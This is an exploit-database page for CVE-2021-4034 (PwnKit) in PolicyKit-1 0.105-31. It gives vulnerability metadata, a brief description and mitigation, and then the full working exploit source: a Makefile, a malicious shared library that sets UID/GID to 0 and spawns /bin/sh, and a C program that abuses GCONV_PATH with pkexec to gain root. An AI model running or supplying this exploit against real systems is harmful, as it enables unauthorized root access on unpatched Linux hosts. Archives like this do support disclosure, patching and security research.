header-logo
Suggest Exploit
vendor:
PolicyKit-1
by:
Lance Biggerstaff
7.8
CVSS
HIGH
Privilege Escalation
269
CWE
Product Name: PolicyKit-1
Affected Version From: 0.105-31
Affected Version To: 0.105-31
Patch Exists: YES
Related CWE: CVE-2021-4034
CPE: a:polkit:policykit-1
Metasploit: https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/rocky_linux-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp8-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp10-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/debian-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/suse-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2021-4034/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2021-4034/
Other Scripts:
Platforms Tested: Linux
2022

PolicyKit-1 0.105-31 – Privilege Escalation

The exploit consists of three files `Makefile`, `evil-so.c` & `exploit.c`. The Makefile is used to compile the evil-so.c and exploit.c files. The evil-so.c file contains code to set the UID and GID to 0 and execute a shell. The exploit.c file creates a directory and a gconv-modules file, copies the evil.so file to the directory and executes the pkexec binary with the environment variables set to the directory. This allows the evil.so file to be loaded and executed.

Mitigation:

The user should update to the latest version of PolicyKit-1 and ensure that the environment variables are not set to a malicious directory.
Source

Exploit-DB raw data:

# Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation
# Exploit Author: Lance Biggerstaff
# Original Author: ryaagard (https://github.com/ryaagard)
# Date: 27-01-2022
# Github Repo: https://github.com/ryaagard/CVE-2021-4034
# References: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt

# Description: The exploit consists of three files `Makefile`, `evil-so.c` & `exploit.c`

##### Makefile #####

all:
	gcc -shared -o evil.so -fPIC evil-so.c
	gcc exploit.c -o exploit

clean:
	rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so

#################

##### evil-so.c #####

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void gconv() {}

void gconv_init() {
    setuid(0);
    setgid(0);
    setgroups(0);

    execve("/bin/sh", NULL, NULL);
}

#################

##### exploit.c #####

#include <stdio.h>
#include <stdlib.h>

#define BIN "/usr/bin/pkexec"
#define DIR "evildir"
#define EVILSO "evil"

int main()
{
    char *envp[] = {
        DIR,
        "PATH=GCONV_PATH=.",
        "SHELL=ryaagard",
        "CHARSET=ryaagard",
        NULL
    };
    char *argv[] = { NULL };

    system("mkdir GCONV_PATH=.");
    system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR);
    system("mkdir " DIR);
    system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules");
    system("cp " EVILSO ".so " DIR);

    execve(BIN, argv, envp);

    return 0;
}

#################

Navigation

Suggest Exploit

Services By CQR